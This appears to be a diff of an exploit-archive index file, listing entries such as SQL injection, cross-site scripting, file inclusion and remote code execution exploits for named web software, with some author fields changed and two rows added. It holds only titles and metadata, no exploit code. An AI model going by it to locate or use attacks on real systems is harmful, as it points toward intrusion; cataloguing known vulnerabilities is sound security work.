29737,exploits/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion",1970-01-01,h4ck3r,webapps,php,
|
||||
29742,exploits/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",1970-01-01,"Immerda Project Group",webapps,php,
|
||||
29744,exploits/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",1970-01-01,"Abdus Samad",webapps,php,
|
||||
29745,exploits/php/webapps/29745.txt,"Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting",1970-01-01,"Moritz Naumann",webapps,php,
|
||||
29747,exploits/php/webapps/29747.txt,"DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting",1970-01-01,Mandr4ke,webapps,php,
|
||||
29748,exploits/php/webapps/29748.txt,"Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
29748,exploits/php/webapps/29748.txt,"Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal",1970-01-01,h4ck3r,webapps,php,
|
||||
29750,exploits/php/webapps/29750.php,"phpStats 0.1.9 - Multiple SQL Injections",1970-01-01,rgod,webapps,php,
|
||||
29751,exploits/php/webapps/29751.php,"phpStats 0.1.9 - 'PHP-Stats-options.php' Remote Code Execution",1970-01-01,rgod,webapps,php,
|
||||
29754,exploits/php/webapps/29754.html,"WordPress Core < 2.1.2 - 'PHP_Self' Cross-Site Scripting",1970-01-01,"Alexander Concha",webapps,php,
|
||||
|
@ -34021,7 +34022,7 @@ id,file,description,date,author,type,platform,port
|
|||
30737,exploits/php/webapps/30737.txt,"Galmeta Post 0.2 - 'Upload_Config.php' Remote File Inclusion",1970-01-01,"arfis project",webapps,php,
|
||||
30738,exploits/php/webapps/30738.txt,"E-Vendejo 0.2 - 'Articles.php' SQL Injection",1970-01-01,r00t,webapps,php,
|
||||
30739,exploits/php/webapps/30739.txt,"JLMForo System - 'Buscado.php' Cross-Site Scripting",1970-01-01,"Jose Luis Gongora Fernandez",webapps,php,
|
||||
30741,exploits/php/webapps/30741.txt,"easyGB 2.1.1 - 'index.php' Local File Inclusion",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
30741,exploits/php/webapps/30741.txt,"easyGB 2.1.1 - 'index.php' Local File Inclusion",1970-01-01,h4ck3r,webapps,php,
|
||||
30743,exploits/asp/webapps/30743.txt,"i-Gallery 3.4 - 'igallery.asp' Remote Information Disclosure",1970-01-01,hackerbinhphuoc,webapps,asp,
|
||||
30745,exploits/php/webapps/30745.html,"Weblord.it MS-TopSites - Unauthorized Access / HTML Injection",1970-01-01,0x90,webapps,php,
|
||||
30746,exploits/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",1970-01-01,"Giuseppe Gottardi",webapps,php,
|
||||
|
@ -36691,7 +36692,7 @@ id,file,description,date,author,type,platform,port
|
|||
35237,exploits/multiple/webapps/35237.txt,"Gogs - 'label' SQL Injection",1970-01-01,"Timo Schmid",webapps,multiple,80
|
||||
35238,exploits/multiple/webapps/35238.txt,"Gogs - 'users'/'repos' '?q' SQL Injection",1970-01-01,"Timo Schmid",webapps,multiple,
|
||||
35239,exploits/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",1970-01-01,R3d-D3V!L,webapps,php,
|
||||
35245,exploits/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
35245,exploits/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
35246,exploits/php/webapps/35246.py,"Joomla! Component com_hdflvplayer < 2.1.0.1 - Arbitrary File Download",1970-01-01,"Claudio Viviani",webapps,php,
|
||||
35248,exploits/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - Cross-Site Scripting",1970-01-01,"Halil Dalabasmaz",webapps,multiple,
|
||||
35293,exploits/php/webapps/35293.txt,"Joomla! Component com_virtuemart 1.1.6 - SQL Injection",1970-01-01,"Andrea Fabrizi",webapps,php,
|
||||
|
@ -44376,3 +44377,5 @@ id,file,description,date,author,type,platform,port
|
|||
50427,exploits/php/webapps/50427.txt,"WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS)",1970-01-01,"David Álvarez Robles",webapps,php,
|
||||
50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,"RedTeam Pentesting GmbH",webapps,multiple,
|
||||
50429,exploits/php/webapps/50429.py,"Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)",1970-01-01,"Chase Comardelle",webapps,php,
|
||||
50430,exploits/hardware/webapps/50430.txt,"SonicWall SMA 10.2.1.0-17sv - Password Reset",1970-01-01,"Jacob Baines",webapps,hardware,
|
||||
50432,exploits/php/webapps/50432.txt,"Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue